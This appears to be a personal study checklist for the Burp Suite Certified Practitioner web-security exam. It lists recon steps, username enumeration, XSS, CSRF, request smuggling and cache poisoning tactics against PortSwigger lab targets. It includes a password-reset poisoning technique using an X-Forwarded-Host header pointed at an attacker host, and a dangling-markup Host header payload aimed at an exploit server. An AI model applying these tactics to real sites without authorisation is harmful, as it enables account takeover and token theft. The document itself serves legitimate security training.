Untitled
Write about what kind of website functions are corelated with certain vulnerabilities Important page: https://github.com/DingyShark/BurpSuiteCertifiedPractitioner#http-request-smuggling
-
THE MOST IMPORTANT THINGS TO DO AT START:
- I AM NOT HACKING NOT PWNING I DO NOT HAVE TO FINISH THIS
- Im curious about how these things works. I want to understand it!!!
- **Check the source code of the pages (including / comment section, forgot password etc.)
- Check how the actions behave ->
- Is something affecting cookie? -> maybe we can use it to escalate privileges. Recently I have situation, when the forgot password utulity was changing the username in the cookie and if i was logged in as legitemate user I could change username to administrator
- Is there prototype pollution? look if we can perform xss attack or make the request being rewrited in the search/comment section. (use DOM intruder)
- Is the cache in the headers? - If you see miss/hit we can be sure that there may be something
- Can you enumerate usernames in the forgot password section?
- Take a note when you find something but you don't know how to use it - write how it works, what do you see
- Is X-Frame-Options set up to sameorigin? if not you can try clickjacking
- Is there CORS header setup? - you can try to exfiltrate data via ajax/fetch
-
- check for xss, manually files + use burp built in browser/dom invader
- remember of comments section
- canonical
-
perform dir busting and subdomain busting including graph ql endpoints
-
check password reset things nextly bruteforce authentication
-
run param mainer
-
XXE - dns lookup
app overlook
Check what's inside application, play with it.
- Can you enumerate usernames(more than carlos)?:
- different responses
- time
- password reset thing
First user
- XSS all locations
- Dirbusting, register page and other.
- Forgot password
- CSRF
- Request Smuggling
- Web cache poisoning
dirbusting
Firstly we want to look for hidden files, directories that may contain useful informations.
- Use raft-small-words - it contains git etc. with extensions like .txt .php .html .js
- Test the API for graphQL [[GraphQL#finding graphql endpoints]]
- Use burp -> target -> enagement tools -> Discover Content
subdomains enumeration
fuff -u https://FUZZ.lab.id -w /usr/share/wordlist/seclists/Discovery/DNS/subdomains-top1million-20000.txt
auth bypass
- Host validation bypass via connection state attack [[Authorization bypass]]
sending data
JSON
- Try to inject more than one paramterer for example
{ "userId": 1, "userId": 2 }
- check if the parameter can be string or int
- check if the parameter can be object
{"userId": {"blabla":1}}
- if it is an object check if it's vulnerable to prototype pollution.
- Try to change Content-Type and send different content
- `Content-Type: www/x
- perform test for race conditions I NNNEEDDD LINNKK HEREEE
- SQL/NOSql injection
- ** IF THERE IS roleID TRY USE INTRUDER AND A LOT OF DIFFERENT NUMBERS **
POST general
- check how it react to bad characters (use special characters)
- add additional parameters like another username
- remove parameter like password etc. and observe behaviour
POST / HTTP/1.1 Host: xyz Content-Length... csrf=blabla&username=carlos&username=admin&.....
CSRF
Where it can be:
- form submission (csrf token not needed or not tied to session)
- ajax (xmlhttprequest) or fetch can be used when the proper CORS is set up
XSS
Location to search
- search query - remember USE REPEATER FOR SEARCH QUERY IN ORDER NOT TO ENCODE CONTENT
- login page with autocomplete fields [[Reflected XSS main payloads#credentials steal]]
- error pages - when we enter page like /404 and we get info /404 not found, it may be vulnerable to XSS, also USE REPEATER
- dom elements
- web cache poisoning
- request smuggling h2.c0 [[Smuggling HTTP 2.0#H2.CL]]
Capture other users requests
- CSRF (post data)
- request smuggling
- cookie steal [[Smuggling HTTP 1.1#cookie steal]]
- frontend request rewriting [[Smuggling HTTP 1.1#Identyfing frontend request rewriting]]
- if there is no cache poisoning but some headers are reflected on the page [[Smuggling HTTP 1.1#xss via user agent]]
- H2 queue posioning [[Smuggling HTTP 2.0#Response queue poisoning via H2.TE request smuggling]]
- ** REMEMBER THAT SOMETIMES YOU NEED TO FIND OTHER ENDPOINT THAN / (
/
can be not vulnerable) ** - Request smuggling urls maybe : /admin /my-account etc, some svg file etc.
Change email
#todo Race condition in changing email or other parameters single-point rac econdition
http request poisoning
in progress
Password Reset
headers
X-Forwarded-Host: attackerhost
or similar headers:
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
or
X-Forwarded-Scheme: http
X-Forwarded-Host: attackerhost
We can use ** Param Miner Guess Headers ** -> but remember ** use it at the password reset page **
- Host header change:
Host: YOUR-LAB-ID.web-security-academy.net:arbitraryport
Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?
and send
GET /?/login'>[…]
tokens
timestamp
Try to send multiple request of password reset at once. What to do:
- Grab another session cookie along with CSRF token
- For testing send two POST requests in pararell to get token for the same user.
- Check the email
- POC [[Password reset race condition]]
prototype pollution
Open burp browser: Proxy -> Intercept -> Open Browser Open Chrome Dev Tools -> goto Dom Invader -> Reload page
comments about last trials
- I didn't check the page sources properly
- I wasn't curious enough about how things works
- I WASN'T CALM, I WAS AGITATED - THIS IS MAIN REASON WHY I FAILED